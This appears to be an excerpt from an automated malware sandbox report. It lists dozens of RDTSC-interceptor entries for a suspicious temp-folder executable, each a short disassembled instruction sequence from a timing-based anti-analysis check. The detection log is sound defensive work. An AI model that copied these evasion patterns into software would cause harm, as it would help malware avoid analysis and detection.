                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B3B7 second address: 60B3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0397h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4C288D0390h 0x00000012 jmp 00007F4C288D038Ch 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B55A second address: 60B57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F4C28D8B363h 0x0000000d jns 00007F4C28D8B356h 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B57C second address: 60B581 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B81A second address: 60B82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B361h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B82F second address: 60B833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60D6F6 second address: 60D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4C28D8B35Bh 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60D70C second address: 60D712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 61306F second address: 61307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F4C28D8B362h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 61307C second address: 613082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 614A4C second address: 614A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4C28D8B366h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 614A67 second address: 614A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 616A13 second address: 616A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50706BF second address: 50706D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, A516h 0x00000011 mov eax, edi 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50706D9 second address: 50706DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50706DF second address: 50706E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50706E3 second address: 5070701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070701 second address: 5070741 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4C288D0399h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F4C288D038Ah 0x00000016 sbb ax, 1AC8h 0x0000001b jmp 00007F4C288D038Bh 0x00000020 popfd 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030D76 second address: 5030D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030D7A second address: 5030DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4C288D0396h 0x0000000c add esi, 35553C38h 0x00000012 jmp 00007F4C288D038Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4C288D0390h 0x00000025 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030DC1 second address: 5030DD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080800 second address: 5080806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080806 second address: 5080817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B35Dh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4FF0B25 second address: 4FF0B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4FF0B2B second address: 4FF0B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C28D8B367h 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4FF0B57 second address: 4FF0B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4FF0B5D second address: 4FF0B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030AC5 second address: 5030AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030AD3 second address: 5030B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C28D8B366h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B00 second address: 5030B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B04 second address: 5030B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B08 second address: 5030B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B0E second address: 5030B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4C28D8B365h 0x00000008 pop eax 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4C28D8B364h 0x00000019 or cx, CFC8h 0x0000001e jmp 00007F4C28D8B35Bh 0x00000023 popfd 0x00000024 mov ecx, 25ECA13Fh 0x00000029 popad 0x0000002a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B5D second address: 5030BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4C288D038Bh 0x00000009 adc eax, 2BB2960Eh 0x0000000f jmp 00007F4C288D0399h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F4C288D0390h 0x0000001b or si, 8488h 0x00000020 jmp 00007F4C288D038Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b jmp 00007F4C288D0396h 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov ebx, 3E08AB00h 0x00000039 mov bh, 77h 0x0000003b popad 0x0000003c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030BD5 second address: 5030BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020AE2 second address: 5020B21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C288D038Eh 0x0000000f push eax 0x00000010 jmp 00007F4C288D038Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B21 second address: 5020B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B3C second address: 5020B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B42 second address: 5020B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B46 second address: 5020B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B56 second address: 5020B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B5A second address: 5020B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B60 second address: 5020B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F43 second address: 5070F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bl 0x00000005 mov ah, B4h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b jmp 00007F4C288D0398h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4C288D038Ah 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F77 second address: 5070F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F7B second address: 5070F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F81 second address: 5070F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B35Dh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F92 second address: 5070F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F96 second address: 5070FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F4C28D8B364h 0x00000015 jmp 00007F4C28D8B365h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070E6F second address: 5070E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070E75 second address: 5070EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e pushfd 0x0000000f jmp 00007F4C28D8B35Ah 0x00000014 jmp 00007F4C28D8B365h 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4C28D8B35Ch 0x00000023 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070CF8 second address: 5070CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070CFE second address: 5070D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 pushfd 0x00000011 jmp 00007F4C28D8B369h 0x00000016 add si, 7036h 0x0000001b jmp 00007F4C28D8B361h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030C66 second address: 5030C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030C6A second address: 5030C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080302 second address: 508038C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4C288D0391h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F4C288D038Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b call 00007F4C288D0393h 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov eax, dword ptr [ebp+08h] 0x00000025 jmp 00007F4C288D0392h 0x0000002a and dword ptr [eax], 00000000h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F4C288D0397h 0x00000034 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 508038C second address: 50803C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4C28D8B368h 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50803C9 second address: 50803CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A4A second address: 5020A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, di 0x0000000e mov bx, 7A00h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A71 second address: 5020A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A75 second address: 5020A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A7B second address: 5020A81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A81 second address: 5020A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080104 second address: 5080108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080108 second address: 508010C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 508010C second address: 508012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C288D0397h 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 508012F second address: 5080133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080133 second address: 5080139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080139 second address: 508013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 508013F second address: 5080143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5050CD3 second address: 5050CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5050CD9 second address: 5050CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A29 second address: 5040A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A2D second address: 5040A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A33 second address: 5040A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C28D8B360h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4C28D8B35Ch 0x00000019 sbb eax, 2C3C8BF8h 0x0000001f jmp 00007F4C28D8B35Bh 0x00000024 popfd 0x00000025 mov si, BD2Fh 0x00000029 popad 0x0000002a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A84 second address: 5040A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A8A second address: 5040AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4C28D8B366h 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000024 second address: 5000029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000029 second address: 500003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, 68D8677Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 500003D second address: 5000043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000043 second address: 500008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C28D8B35Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4C28D8B367h 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 500008A second address: 5000090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
